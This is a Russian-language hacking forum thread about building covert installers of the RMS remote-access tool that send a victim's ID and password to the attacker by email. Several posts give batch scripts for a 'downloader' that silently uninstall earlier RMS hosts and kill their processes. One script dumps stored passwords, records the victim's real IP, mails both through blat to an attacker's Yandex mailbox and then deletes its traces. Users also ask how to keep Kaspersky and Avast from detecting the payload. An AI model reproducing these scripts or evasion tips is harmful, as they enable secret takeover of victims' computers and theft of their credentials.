RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. beniamin
    beniamin Новичок
    Симпатии:
    0
    друзья кто может написать батник для удаления хоста 5,4 (переработанного)
    о вобще было бы хорошо если бы кто то собрал универсальный батник для удаления
    чтоб проверял в (program files,program files (x86),sysfiles, и тд) естественно с бонусом taskkill для rutsrv,rfsclient
    тогда его можно было бы поставить в даунлодер и 99% можно было бы взломать даже компютер где уже раньше стояла произвольная версия хоста(и server до 5,2 и host от 5,3) на любой винде,хоть 64 битную восмерку
     
    15 янв 2013
  2. pupup2
    pupup2 Новичок
    Симпатии:
    0
    beniamin,
    лови,попробуй этот батник..у меня он удаляет 5.4
    @echo off
    "%SYSTEMROOT%\System32\sysfiles\RManServer.exe" /stop
    "%SYSTEMROOT%\SysWOW64\sysfiles\RManServer.exe" /stop
    "%SYSTEMROOT%\System32\sysfiles\RManServer.exe" /silentuninstall
    "%SYSTEMROOT%\SysWOW64\sysfiles\RManServer.exe" /silentuninstall
    taskkill /f /im rfusclient.exe
    taskkill /f /im RManServer.exe
    taskkill /f /im rutserv.exe
    reg delete "HKLM\SYSTEM\Remote Manipulator System" /f


    del /f /q %SYSTEMROOT%\System32\sysfiles\vp8encoder.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\vp8decoder.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\rwln.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\rutserv.exe
    del /f /q %SYSTEMROOT%\System32\sysfiles\ripcserver.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\rfusclient.exe
    del /f /q %SYSTEMROOT%\System32\sysfiles\rasadhl.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\oledl.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\msvcr90.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\msimg32.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\manifes.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\gdiplus.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\decoders.dll
    del /f /q %SYSTEMROOT%\System32\sysfiles\coders.dll

    attrib -s -h "%SYSTEMROOT%\System32\sysfiles"
    rmdir /s /q %SYSTEMROOT%\System32\sysfiles


    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\vp8encoder.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\vp8decoder.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\rwln.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\rutserv.exe
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\ripcserver.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\rfusclient.exe
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\rasadhl.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\oledl.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\msvcr90.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\msimg32.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\manifes.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\gdiplus.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\decoders.dll
    del /f /q %SYSTEMROOT%\SysWOW64\sysfiles\coders.dll

    attrib -s -h "%SYSTEMROOT%\SysWOW64\sysfiles\"
    rmdir /s /q %SYSTEMROOT%\SysWOW64\sysfiles\

    @exit
    я не силен в батниках,но удаляет
     
    15 янв 2013
  3. beniamin
    beniamin Новичок
    Симпатии:
    0
    pupup2,
    спасибо дружище
    я попробую немного доделать
    кто еще пробовал собрать 5,4
    как у кого вышло у меня нет придупреждения об отправки ИД но веб камеру немогу тестировать
     
    15 янв 2013
  4. pupup2
    pupup2 Новичок
    Симпатии:
    0
    та,незачто,отпишись если помог..просто разные типы сборок,но у меня помогает удаляет 5.4:pivo:
     
    15 янв 2013
  5. beniamin
    beniamin Новичок
    Симпатии:
    0
    в даунлодере я ставил такой батник
    @echo off
    chcp 1251

    @attrib -S -H -r "%ProgramFiles%\Remote Manipulator System - Server"
    @attrib -S -H -r "%ProgramFiles(x86)%\Remote Manipulator System - Server"
    @attrib -S -H -r "%windir%\system32\sysfiles"
    @attrib -S -H -r "%windir%\syswow64\sysfiles"
    @"%ProgramFiles%\Remote Manipulator System - Server\rutserv.exe" /stop
    @"%ProgramFiles(x86)%\Remote Manipulator System - Server\rutserv.exe" /stop
    @"%ProgramFiles%\Remote Manipulator System - Server\rutserv.exe" /silentuninstall
    @"%ProgramFiles(x86)%\Remote Manipulator System - Server\rutserv.exe" /silentuninstall
    @"%windir%\system32\sysfiles\rutserv.exe" /stop
    @"%windir%\syswow64\sysfiles\rutserv.exe" /stop
    @"%windir%\system32\sysfiles\rutserv.exe" /silentuninstall
    @"%windir%\syswow64\sysfiles\rutserv.exe" /silentuninstall
    @net stop rmanservice
    @sc delete "rmanservice"
    @taskkill /f /im rfusclient.exe
    @taskkill /f /im rutserv.exe
    @reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Un install\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f
    @reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\In staller\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\Insta llProperties" /f
    @reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f
    @reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
    @MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress
    @MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
    @MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress
    @reg delete "HKLM\System\CurrentControlSet\Services\RManServic e" /f
    @del "%ProgramFiles%\Remote Manipulator System - Server\*.*" /q
    @rmdir "%ProgramFiles%\Remote Manipulator System - Server"
    @del "%ProgramFiles(x86)%\Remote Manipulator System - Server\*.*" /q
    @rmdir "%ProgramFiles(x86)%\Remote Manipulator System - Server"
    @del "%windir%\system32\sysfiles\*.*" /q
    @rmdir "%windir%\system32\sysfiles"
    @del "%windir%\syswow64\sysfiles\*.*" /q
    @rmdir "%windir%\syswow64\sysfiles"

    @exit

    но это было для старой
    @reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Un install\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f
    вот в этой строке для 5,4 {11A90858-40BB-4858-A2DA-CA6495B5E907} надо заменить на что то другое,где то написал но уже потерялся
     
    16 янв 2013
  6. deity
    deity Новичок
    Симпатии:
    7
    и че? новый айди ты все равно не получишь. какой смысл заливать свой хост если им не поконтролить?
     
    18 янв 2013
  7. lexone
    lexone Новичок
    Симпатии:
    0
    Всем привет!

    Вообщем сделал я все по инструкции и вродь как все работает :) Только вот при запуски файлика, у человека вылетает сайт программы, и это очень палит... Кто может помочь?
     
    20 янв 2013
  8. scandalist
    scandalist Новичок
    Симпатии:
    3
    Стало быть, не по инструкции делал. Или по какой-то своей выдуманной инструкции. Вот невыдуманная инструкция. Вот крайняя версия сборки.
     
    20 янв 2013
  9. lexone
    lexone Новичок
    Симпатии:
    0
    scandalist, спасибо, сейчас пойду тестить.

    P.S. Делал по другой инструкции oO

    Добавлено через 15 минут
    scandalist, большущие тебе СПАСИБО!!! Целый день по чужим мануалам копался и тупил.... А тут все работает на УРА!:yahoo:

    P.S скинь wmr кошель в ЛС, отблагодарю. Ибо очень мне помог)
     
    Последнее редактирование: 20 янв 2013
    20 янв 2013
  10. GeForse
    GeForse Новичок
    Симпатии:
    4
    Такие дела у меня
    http://imageshost.ru/photo/81437/id2725389.html
    http://imageshost.ru/photo/27230/id2725388.html
    http://imageshost.ru/photo/27636/id2725387.html
    http://imageshost.ru/photo/61238/id2725386.html
    http://imageshost.ru/photo/4407/id2725385.html

    Касперский назойливо рекомендует удалить .exe и блокирует всё =(
    писал на офф сайт, ответили что там же пишет что это не вирус а потенциально опасная программа просто и беспокоится не о чем...
    Как сделать так чтобы .exe рмса в касперском не определялись? :dontknow:
    и ещё агрится на библиотеку: RIPCServer.dll
    пробовал и криптовать чутка и пересобирал с разными экзэшниками и dll (нашёл .exe которые каспер не палит, но кидают ошибку http://imageshost.ru/photo/23208/id2732668.html из за удалённой печати походу) собирал msi из экзешников которые не паляться и dll но после упаковки стали палиться
     
    Последнее редактирование: 20 янв 2013
    20 янв 2013
  11. lexone
    lexone Новичок
    Симпатии:
    0
    Ну я отрубил у себя каспера и все сделал, однако проблемы в другом. Когда жертва запускает у себя файл (и у нее стоит каспер), антивирус то не палит, однако в диспетчере задач не запускаются 3 процесса (которые отвечают за rms). Что можно сделать? Я дажt готов заплатить за решение.
     
    Последнее редактирование: 20 янв 2013
    20 янв 2013
  12. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Здорово всем! Ребята подскажите .у одной жертвы Каспер . у другой Аваст .закидываю сбор.но антивир недаёт открыть ехе !!! удолил


    start /wait %temp%\mpr.exe /export
    realip.exe > realip.txt
    ping -n 5 127.0.0.1 > nul
    blat.exe -install -server smtp.yandex.ru -port 25 -f ###LOGIN###@yandex.ru -u ###LOGIN### -pw ###PASSWORD###
    blat.exe -to ###LOGIN###@yandex.ru -subject "PERFECTLY! RMS Service (c) by Alex Hitch" -attachi "realip.txt" -body "Real Ip [pass]" -attach %temp%\*.mpf

    attrib -s -h -r "%temp%/blat.dll"
    attrib -s -h -r "%temp%/blat.lib"
    attrib -s -h -r "%temp%/block_reader.sys"
    attrib -s -h -r "%temp%/HookLib.dll"
    attrib -s -h -r "%temp%/blat.exe"
    attrib -s -h -r "%temp%/mpr.exe"
    attrib -s -h -r "%temp%/realip.exe"
    attrib -s -h -r "%temp%/mpr.ini"

    del /f /q %temp%\realip.txt
    del /f /q %temp%\ipconfig.txt
    del /f /q %temp%\*.mpf
    del /f /q %temp%\blat.dll
    del /f /q %temp%\blat.exe
    del /f /q %temp%\blat.lib
    del /f /q %temp%\block_reader.sys
    del /f /q %temp%\HookLib.dll
    del /f /q %temp%\mpr.ini
    del /f /q %temp%\mpr.exe
    del /f /q %temp%\realip.exe

    attrib -s -h -r "%temp%\stop.js"
    attrib -s -h -r "%temp%\install.bat"

    del /f /q "%temp%\stop.js"
    del /f /q "%temp%\install.bat

    непомогло! может ещё что ? удолить:bc:
     
    21 янв 2013
  13. ParazziT
    ParazziT Новичок
    Симпатии:
    0
    scandalist,
    давайте вы прекратите свой пиар перед не понятно кем. Я уже писал, что ваша инструкция шаткая, не гарантирующая на сто процентов работы по нескольким пунктам, и на эти моменты вы так и не удосужились дать приемлемый ответ профессионала, коим выставляете себя здесь. Если вами здесь поддерживается разговор с людьми, понимающими гораздо меньше вашего в этих вопросах, то вполне нормально было бы снизойти до этого уровня и по людски объяснить нюансы. Либо же вовсе игнорировать. А то получается, что "У меня есть конфетка, но я её никому не дам".
     
    22 янв 2013
  14. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Ребята не обессудьте но я не пойму для каго тут вся инфа! походу для школоты.каторые потом понтуются на перемене перед друг другом своими ехе.и строют из себя хакеров.если я прав то извените!!! просто я не поадресу обратился.ошибся.сорри!.Но как бы там не было вся инфа здесь. была мне полезной! Админам большой респект!!!!!!:pivo:
     
    22 янв 2013
  15. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Ребята кто может зделать сбор RMS что бы Каспер непалил ехе!!! за деньги я непожалею бабла!!! маякните если что):af:
     
    23 янв 2013
  16. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Мпр выкини и батничег переделай и даже не вякнет
     
    23 янв 2013
  17. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Спасибо за инфу! старик если тебе не в лом покажи тут что надо удолить? что бы я не ошибся(
     
    23 янв 2013
  18. GeForse
    GeForse Новичок
    Симпатии:
    4
    4ekkk,
    Да, да, очень интересно послушать, по подробнее пожалуйста
     
    23 янв 2013
  19. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    пишите в личку чем смогу помогу
     
    23 янв 2013
  20. GeForse
    GeForse Новичок
    Симпатии:
    4
    4ekkk,
    "4ekkk превысил(а) максимальный объём сохранённых личных сообщений и не может получать новые сообщения, пока не удалит часть старых."
     
    23 янв 2013
Статус темы:
Закрыта.
Загрузка...